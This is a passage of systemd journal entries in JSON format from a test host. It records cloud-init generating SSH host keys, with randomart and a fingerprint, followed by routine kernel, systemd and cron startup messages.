"_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| + =o o.+ * *+|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2bb;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=4aa22db2063ddc55", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| O . . 
= * B|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2bc;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=28e3fbd75f74d823", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| o o. .o.=.o.|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2bd;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=bd50657e96b79a01", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+----[SHA256]-----+" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2be;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=d7c073cdcdbf46d6", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Generating public/private ed25519 key pair." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2bf;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8539d8794592c42b", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your identification has been saved in /etc/ssh/ssh_host_ed25519_key." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c0;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=a04169e245d150cc", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your public key has been saved in /etc/ssh/ssh_host_ed25519_key.pub." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c1;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2faa7d692a908da5", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key fingerprint is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c2;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=345a32106e197585", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "SHA256:LGSFwDAA7B9jve87IoPLkG3UGaAwTRLkJQeTPTX2mWw root@test-1" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c3;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=547039c05140533d", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key's randomart image is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c4;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=d5b5481a3afeba41", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+--[ED25519 256]--+" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c5;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=3e5a8ac5210aedd6", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|@XO=o= .. |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c6;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=f5fbc907c61aa5b1", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o**=o =.o |" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c7;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=b7315a6e7d8d6822", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o. + oE |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c8;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=198e39844a6fea32", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . = *.. 
|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c9;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=c32fc07777cefd49", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| + = o S |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ca;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8336df269661001a", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| + . . . 
|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2cb;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=1ca725f94f5f57a0", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o + . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2cc;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=60dd92c320805416", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|oo o . 
o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2cd;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=92ed6654ceb9e458", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| o. o ooo |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ce;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=bd50657e96b79a01", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+----[SHA256]-----+" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2cf;b=e2b08827b5804427b422c10c84f1567e;m=2a5be59;t=5bd16df693dc1;x=a21ce3aac33b82b6", "__REALTIME_TIMESTAMP" : "1615280818699713", "__MONOTONIC_TIMESTAMP" : "44416601", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "4", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "43924614", "MESSAGE" : "new mount options do not match the existing superblock, will be ignored" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d0;b=e2b08827b5804427b422c10c84f1567e;m=2a5bff9;t=5bd16df693f60;x=edb88feae3407441", "__REALTIME_TIMESTAMP" : "1615280818700128", "__MONOTONIC_TIMESTAMP" : "44417017", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "cloud-init.service", "INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Started Initial cloud-init job (metadata service crawler).", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817868317" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d1;b=e2b08827b5804427b422c10c84f1567e;m=2a5c692;t=5bd16df6945f9;x=c1ed6e345db6ff96", "__REALTIME_TIMESTAMP" : "1615280818701817", "__MONOTONIC_TIMESTAMP" : "44418706", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "SYSLOG_IDENTIFIER" : "cron", "SYSLOG_PID" : "777", "MESSAGE" : "(CRON) INFO (pidfile fd = 3)", "_PID" : "777", "_COMM" : "cron", "_EXE" : "/usr/sbin/cron", "_CMDLINE" : "/usr/sbin/cron -f", "_SYSTEMD_CGROUP" : "/system.slice/cron.service", "_SYSTEMD_UNIT" : "cron.service", "_SYSTEMD_INVOCATION_ID" : "639ae62205e749a080eec1bd83ca7856", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818087625" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d2;b=e2b08827b5804427b422c10c84f1567e;m=2a5cf41;t=5bd16df694ea8;x=9950e60fc01aa9cd", "__REALTIME_TIMESTAMP" : "1615280818704040", "__MONOTONIC_TIMESTAMP" : "44420929", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", 